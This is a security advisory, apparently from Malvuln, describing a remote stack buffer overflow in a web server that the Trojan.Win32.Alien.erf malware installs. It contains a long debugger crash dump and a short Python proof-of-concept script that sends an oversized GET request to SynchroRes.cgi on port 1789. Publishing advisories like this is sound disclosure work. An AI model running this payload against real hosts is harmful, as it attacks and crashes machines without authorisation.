Trojan.Win32.Alien.erf / Remote Stack Buffer Overflow

2021.06.17
us malvuln (US) us
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/57ab194d8c60ee97914eda22e4d71b68_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan.Win32.Alien.erf Vulnerability: Remote Stack Buffer Overflow Description: The malware deploys a Web server AM6WebMgr.exe (JAO build 809) listening on TCP port 1789. Third-party attackers who can reach an infected host can trigger a classic remote buffer overflow by making a HTTP GET request for the "SynchroRes.cgi" URL with a long payload. This will overwrite the ECX and EIP stack registers. Type: PE32 MD5: 57ab194d8c60ee97914eda22e4d71b68 Vuln ID: MVID-2021-0252 ASLR: False DEP: True Safe SEH: True Disclosure: 06/16/2021 Memory Dump: EAX : 00000000 EBX : 00000000 ECX : 41414141 EDX : 77279D70 ntdll.77279D70 EBP : 000A12E0 ESP : 000A12C0 ESI : 00000000 EDI : 00000000 EIP : 41414141 EFLAGS : 00010246 ZF : 1 OF : 0 am6webmgr.4FCF00 (1b74.1b40): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=41414141 edx=77279d70 esi=00000000 edi=00000000 eip=41414141 esp=000a12c0 ebp=000a12e0 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:000> .ecxr eax=00000000 ebx=00000000 ecx=41414141 edx=77279d70 esi=00000000 edi=00000000 eip=41414141 esp=000a12c0 ebp=000a12e0 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** ERROR: Module load completed but symbols could not be loaded for AM6WebMgr.exe *** ERROR: Symbol file could not be found. Defaulted to export symbols for JAONPServ.dll - Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: AM6WebMgr+3061e 0043061e f3a4 rep movs byte ptr es:[edi],byte ptr [esi] EXCEPTION_RECORD: 0019eaf0 -- (.exr 0x19eaf0) ExceptionAddress: 0043061e (AM6WebMgr+0x0003061e) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 001a0000 Attempt to write to address 001a0000 PROCESS_NAME: AM6WebMgr.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000008 EXCEPTION_PARAMETER2: 41414141 WRITE_ADDRESS: 41414141 FOLLOWUP_IP: AM6WebMgr+3061e 0043061e f3a4 rep movs byte ptr es:[edi],byte ptr [esi] FAILED_INSTRUCTION_ADDRESS: +3061e 41414141 ?? ??? MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 IP_ON_HEAP: 41414141 The fault address in not in any loaded module, please check your build's rebase log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. IP_IN_FREE_BLOCK: 41414141 CONTEXT: 0019eb40 -- (.cxr 0x19eb40) eax=04b116c7 ebx=000005e6 ecx=00000307 edx=000005e6 esi=04b113c0 edi=001a0000 eip=0043061e esp=0019efa0 ebp=0019efcc iopl=0 nv up ei pl nz na pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207 AM6WebMgr+0x3061e: 0043061e f3a4 rep movs byte ptr es:[edi],byte ptr [esi] Resetting default scope FAULTING_THREAD: ffffffff BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 LAST_CONTROL_TRANSFER: from 0044a12c to 0043061e STACK_TEXT: 0019efa0 0043061e am6webmgr+0x3061e 0019efd4 0044a12c am6webmgr+0x4a12c 0019f008 004438b5 am6webmgr+0x438b5 0019f024 00440418 am6webmgr+0x40418 0019f4c8 0044aa27 am6webmgr+0x4aa27 0019f4ec 00401704 am6webmgr+0x1704 0019f510 00423195 am6webmgr+0x23195 0019f848 41414141 unknown!printable+0x0 0019f84c 41414141 unknown!printable+0x0 0019f850 41414141 unknown!printable+0x0 0019f854 41414141 unknown!printable+0x0 0019f858 41414141 unknown!printable+0x0 0019f85c 41414141 unknown!printable+0x0 0019f860 41414141 unknown!printable+0x0 0019f864 41414141 unknown!printable+0x0 0019f868 41414141 unknown!printable+0x0 0019f86c 41414141 unknown!printable+0x0 0019f870 41414141 unknown!printable+0x0 0019f874 41414141 unknown!printable+0x0 0019f878 41414141 unknown!printable+0x0 0019f87c 41414141 unknown!printable+0x0 0019f880 41414141 unknown!printable+0x0 0019f884 41414141 unknown!printable+0x0 0019f888 41414141 unknown!printable+0x0 0019f88c 41414141 unknown!printable+0x0 0019f890 41414141 unknown!printable+0x0 0019f894 41414141 unknown!printable+0x0 0019f898 41414141 unknown!printable+0x0 0019f89c 41414141 unknown!printable+0x0 0019f8a0 41414141 unknown!printable+0x0 0019f8a4 41414141 unknown!printable+0x0 0019f8a8 41414141 unknown!printable+0x0 0019f8ac 41414141 unknown!printable+0x0 0019f8b0 41414141 unknown!printable+0x0 0019f8b4 41414141 unknown!printable+0x0 0019f8b8 41414141 unknown!printable+0x0 0019f8bc 41414141 unknown!printable+0x0 0019f8c0 41414141 unknown!printable+0x0 0019f8c4 41414141 unknown!printable+0x0 0019f8c8 41414141 unknown!printable+0x0 0019f8cc 41414141 unknown!printable+0x0 0019f8d0 41414141 unknown!printable+0x0 0019f8d4 41414141 unknown!printable+0x0 0019f8d8 41414141 unknown!printable+0x0 0019f8dc 41414141 unknown!printable+0x0 0019f8e0 41414141 unknown!printable+0x0 0019f8e4 41414141 unknown!printable+0x0 0019f8e8 41414141 unknown!printable+0x0 0019f8ec 41414141 unknown!printable+0x0 0019f8f0 41414141 unknown!printable+0x0 0019f8f4 41414141 unknown!printable+0x0 0019f8f8 41414141 unknown!printable+0x0 0019f8fc 41414141 unknown!printable+0x0 0019f900 41414141 unknown!printable+0x0 0019f904 41414141 unknown!printable+0x0 0019f908 41414141 unknown!printable+0x0 0019f90c 41414141 unknown!printable+0x0 0019f910 41414141 unknown!printable+0x0 0019f914 41414141 unknown!printable+0x0 0019f918 41414141 unknown!printable+0x0 0019f91c 41414141 unknown!printable+0x0 0019f920 41414141 unknown!printable+0x0 0019f924 41414141 unknown!printable+0x0 0019f928 41414141 unknown!printable+0x0 0019f92c 41414141 unknown!printable+0x0 0019f930 41414141 unknown!printable+0x0 0019f934 41414141 unknown!printable+0x0 0019f938 41414141 unknown!printable+0x0 0019f93c 41414141 unknown!printable+0x0 0019f940 41414141 unknown!printable+0x0 0019f944 41414141 unknown!printable+0x0 0019f948 41414141 unknown!printable+0x0 0019f94c 41414141 unknown!printable+0x0 0019f950 41414141 unknown!printable+0x0 0019f954 41414141 unknown!printable+0x0 0019f958 41414141 unknown!printable+0x0 0019f95c 41414141 unknown!printable+0x0 0019f960 41414141 unknown!printable+0x0 0019f964 41414141 unknown!printable+0x0 0019f968 41414141 unknown!printable+0x0 0019f96c 41414141 unknown!printable+0x0 0019f970 41414141 unknown!printable+0x0 0019f974 41414141 unknown!printable+0x0 0019f978 41414141 unknown!printable+0x0 0019f97c 41414141 unknown!printable+0x0 0019f980 41414141 unknown!printable+0x0 0019f984 41414141 unknown!printable+0x0 0019f988 41414141 unknown!printable+0x0 0019f98c 41414141 unknown!printable+0x0 0019f990 41414141 unknown!printable+0x0 0019f994 41414141 unknown!printable+0x0 0019f998 41414141 unknown!printable+0x0 0019f99c 41414141 unknown!printable+0x0 0019f9a0 41414141 unknown!printable+0x0 0019f9a4 41414141 unknown!printable+0x0 0019f9a8 41414141 unknown!printable+0x0 0019f9ac 41414141 unknown!printable+0x0 0019f9b0 41414141 unknown!printable+0x0 0019f9b4 41414141 unknown!printable+0x0 0019f9b8 41414141 unknown!printable+0x0 0019f9bc 41414141 unknown!printable+0x0 0019f9c0 41414141 unknown!printable+0x0 0019f9c4 41414141 unknown!printable+0x0 0019f9c8 41414141 unknown!printable+0x0 0019f9cc 41414141 unknown!printable+0x0 0019f9d0 41414141 unknown!printable+0x0 0019f9d4 41414141 unknown!printable+0x0 0019f9d8 41414141 unknown!printable+0x0 0019f9dc 41414141 unknown!printable+0x0 0019f9e0 41414141 unknown!printable+0x0 0019f9e4 41414141 unknown!printable+0x0 0019f9e8 41414141 unknown!printable+0x0 0019f9ec 41414141 unknown!printable+0x0 0019f9f0 41414141 unknown!printable+0x0 0019f9f4 41414141 unknown!printable+0x0 0019f9f8 41414141 unknown!printable+0x0 0019f9fc 41414141 unknown!printable+0x0 0019fa00 41414141 unknown!printable+0x0 0019fa04 41414141 unknown!printable+0x0 0019fa08 41414141 unknown!printable+0x0 0019fa0c 41414141 unknown!printable+0x0 0019fa10 41414141 unknown!printable+0x0 0019fa14 41414141 unknown!printable+0x0 0019fa18 41414141 unknown!printable+0x0 0019fa1c 41414141 unknown!printable+0x0 0019fa20 41414141 unknown!printable+0x0 0019fa24 41414141 unknown!printable+0x0 0019fa28 41414141 unknown!printable+0x0 0019fa2c 41414141 unknown!printable+0x0 0019fa30 41414141 unknown!printable+0x0 0019fa34 41414141 unknown!printable+0x0 0019fa38 41414141 unknown!printable+0x0 0019fa3c 41414141 unknown!printable+0x0 0019fa40 41414141 unknown!printable+0x0 0019fa44 41414141 unknown!printable+0x0 0019fa48 41414141 unknown!printable+0x0 0019fa4c 41414141 unknown!printable+0x0 0019fa50 41414141 unknown!printable+0x0 0019fa54 41414141 unknown!printable+0x0 0019fa58 41414141 unknown!printable+0x0 0019fa5c 41414141 unknown!printable+0x0 0019fa60 41414141 unknown!printable+0x0 0019fa64 41414141 unknown!printable+0x0 0019fa68 41414141 unknown!printable+0x0 0019fa6c 41414141 unknown!printable+0x0 0019fa70 41414141 unknown!printable+0x0 0019fa74 41414141 unknown!printable+0x0 0019fa78 41414141 unknown!printable+0x0 0019fa7c 41414141 unknown!printable+0x0 0019fa80 41414141 unknown!printable+0x0 0019fa84 41414141 unknown!printable+0x0 0019fa88 41414141 unknown!printable+0x0 0019fa8c 41414141 unknown!printable+0x0 0019fa90 41414141 unknown!printable+0x0 0019fa94 41414141 unknown!printable+0x0 0019fa98 41414141 unknown!printable+0x0 0019fa9c 41414141 unknown!printable+0x0 0019faa0 41414141 unknown!printable+0x0 0019faa4 41414141 unknown!printable+0x0 0019faa8 41414141 unknown!printable+0x0 0019faac 41414141 unknown!printable+0x0 0019fab0 41414141 unknown!printable+0x0 0019fab4 41414141 unknown!printable+0x0 0019fab8 41414141 unknown!printable+0x0 0019fabc 41414141 unknown!printable+0x0 0019fac0 41414141 unknown!printable+0x0 0019fac4 41414141 unknown!printable+0x0 0019fac8 41414141 unknown!printable+0x0 0019facc 41414141 unknown!printable+0x0 0019fad0 41414141 unknown!printable+0x0 0019fad4 41414141 unknown!printable+0x0 0019fad8 41414141 unknown!printable+0x0 0019fadc 41414141 unknown!printable+0x0 0019fae0 41414141 unknown!printable+0x0 0019fae4 41414141 unknown!printable+0x0 0019fae8 41414141 unknown!printable+0x0 0019faec 41414141 unknown!printable+0x0 0019faf0 41414141 unknown!printable+0x0 0019faf4 41414141 unknown!printable+0x0 0019faf8 41414141 unknown!printable+0x0 0019fafc 41414141 unknown!printable+0x0 0019fb00 41414141 unknown!printable+0x0 0019fb04 41414141 unknown!printable+0x0 0019fb08 41414141 unknown!printable+0x0 0019fb0c 41414141 unknown!printable+0x0 0019fb10 41414141 unknown!printable+0x0 0019fb14 41414141 unknown!printable+0x0 0019fb18 41414141 unknown!printable+0x0 0019fb1c 41414141 unknown!printable+0x0 0019fb20 41414141 unknown!printable+0x0 0019fb24 41414141 unknown!printable+0x0 0019fb28 41414141 unknown!printable+0x0 0019fb2c 41414141 unknown!printable+0x0 0019fb30 41414141 unknown!printable+0x0 0019fb34 41414141 unknown!printable+0x0 0019fb38 41414141 unknown!printable+0x0 0019fb3c 41414141 unknown!printable+0x0 0019fb40 41414141 unknown!printable+0x0 0019fb44 41414141 unknown!printable+0x0 0019fb48 41414141 unknown!printable+0x0 0019fb4c 41414141 unknown!printable+0x0 0019fb50 41414141 unknown!printable+0x0 0019fb54 41414141 unknown!printable+0x0 0019fb58 41414141 unknown!printable+0x0 0019fb5c 41414141 unknown!printable+0x0 0019fb60 41414141 unknown!printable+0x0 0019fb64 41414141 unknown!printable+0x0 0019fb68 41414141 unknown!printable+0x0 0019fb6c 41414141 unknown!printable+0x0 0019fb70 41414141 unknown!printable+0x0 0019fb74 41414141 unknown!printable+0x0 0019fb78 41414141 unknown!printable+0x0 0019fb7c 41414141 unknown!printable+0x0 0019fb80 41414141 unknown!printable+0x0 0019fb84 41414141 unknown!printable+0x0 0019fb88 41414141 unknown!printable+0x0 0019fb8c 41414141 unknown!printable+0x0 0019fb90 41414141 unknown!printable+0x0 0019fb94 41414141 unknown!printable+0x0 0019fb98 41414141 unknown!printable+0x0 0019fb9c 41414141 unknown!printable+0x0 0019fba0 41414141 unknown!printable+0x0 0019fba4 41414141 unknown!printable+0x0 0019fba8 41414141 unknown!printable+0x0 0019fbac 41414141 unknown!printable+0x0 0019fbb0 41414141 unknown!printable+0x0 0019fbb4 41414141 unknown!printable+0x0 0019fbb8 41414141 unknown!printable+0x0 0019fbbc 41414141 unknown!printable+0x0 0019fbc0 41414141 unknown!printable+0x0 0019fbc4 41414141 unknown!printable+0x0 0019fbc8 41414141 unknown!printable+0x0 0019fbcc 41414141 unknown!printable+0x0 0019fbd0 41414141 unknown!printable+0x0 0019fbd4 41414141 unknown!printable+0x0 0019fbd8 41414141 unknown!printable+0x0 0019fbdc 41414141 unknown!printable+0x0 0019fbe0 41414141 unknown!printable+0x0 0019fbe4 41414141 unknown!printable+0x0 0019fbe8 41414141 unknown!printable+0x0 0019fbec 41414141 unknown!printable+0x0 0019fbf0 41414141 unknown!printable+0x0 0019fbf4 41414141 unknown!printable+0x0 0019fbf8 41414141 unknown!printable+0x0 0019fbfc 41414141 unknown!printable+0x0 0019fc00 41414141 unknown!printable+0x0 0019fc04 41414141 unknown!printable+0x0 0019fc08 41414141 unknown!printable+0x0 0019fc0c 41414141 unknown!printable+0x0 0019fc10 41414141 unknown!printable+0x0 0019fc14 41414141 unknown!printable+0x0 0019fc18 41414141 unknown!printable+0x0 0019fc1c 41414141 unknown!printable+0x0 0019fc20 41414141 unknown!printable+0x0 0019fc24 41414141 unknown!printable+0x0 0019fc28 41414141 unknown!printable+0x0 0019fc2c 41414141 unknown!printable+0x0 0019fc30 41414141 unknown!printable+0x0 0019fc34 41414141 unknown!printable+0x0 0019fc38 41414141 unknown!printable+0x0 0019fc3c 41414141 unknown!printable+0x0 0019fc40 41414141 unknown!printable+0x0 0019fc44 41414141 unknown!printable+0x0 0019fc48 41414141 unknown!printable+0x0 0019fc4c 41414141 unknown!printable+0x0 0019fc50 41414141 unknown!printable+0x0 0019fc54 41414141 unknown!printable+0x0 0019fc58 41414141 unknown!printable+0x0 0019fc5c 41414141 unknown!printable+0x0 0019fc60 41414141 unknown!printable+0x0 0019fc64 41414141 unknown!printable+0x0 0019fc68 41414141 unknown!printable+0x0 0019fc6c 41414141 unknown!printable+0x0 0019fc70 41414141 unknown!printable+0x0 0019fc74 41414141 unknown!printable+0x0 0019fc78 41414141 unknown!printable+0x0 0019fc7c 41414141 unknown!printable+0x0 0019fc80 41414141 unknown!printable+0x0 0019fc84 41414141 unknown!printable+0x0 0019fc88 41414141 unknown!printable+0x0 0019fc8c 41414141 unknown!printable+0x0 0019fc90 41414141 unknown!printable+0x0 0019fc94 41414141 unknown!printable+0x0 0019fc98 41414141 unknown!printable+0x0 0019fc9c 41414141 unknown!printable+0x0 0019fca0 41414141 unknown!printable+0x0 0019fca4 41414141 unknown!printable+0x0 0019fca8 41414141 unknown!printable+0x0 0019fcac 41414141 unknown!printable+0x0 0019fcb0 41414141 unknown!printable+0x0 0019fcb4 41414141 unknown!printable+0x0 0019fcb8 41414141 unknown!printable+0x0 0019fcbc 41414141 unknown!printable+0x0 0019fcc0 41414141 unknown!printable+0x0 0019fcc4 41414141 unknown!printable+0x0 0019fcc8 41414141 unknown!printable+0x0 0019fccc 41414141 unknown!printable+0x0 0019fcd0 41414141 unknown!printable+0x0 0019fcd4 41414141 unknown!printable+0x0 0019fcd8 41414141 unknown!printable+0x0 0019fcdc 41414141 unknown!printable+0x0 0019fce0 41414141 unknown!printable+0x0 0019fce4 41414141 unknown!printable+0x0 0019fce8 41414141 unknown!printable+0x0 0019fcec 41414141 unknown!printable+0x0 0019fcf0 41414141 unknown!printable+0x0 0019fcf4 41414141 unknown!printable+0x0 0019fcf8 41414141 unknown!p STACK_COMMAND: .cxr 000000000019EB40 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; dds 19efa0 ; kb SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: am6webmgr+3061e FOLLOWUP_NAME: MachineOwner MODULE_NAME: AM6WebMgr IMAGE_NAME: AM6WebMgr.exe DEBUG_FLR_IMAGE_TIMESTAMP: 5c000237 FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_AM6WebMgr.exe!Unknown BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_am6webmgr+3061e Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=1789 def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) PAYLOAD="GET /SynchroRes.cgi?A=L^&Src="+"A"*1510+ " HTTP/1.0\r\nHost: "+MALWARE_HOST+"\r\n\r\n" s.send(PAYLOAD) print("Trojan.Win32.Alien.erf / Remote Stack Buffer Overflow") print("MD5: 57ab194d8c60ee97914eda22e4d71b68") print("By Malvuln") if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top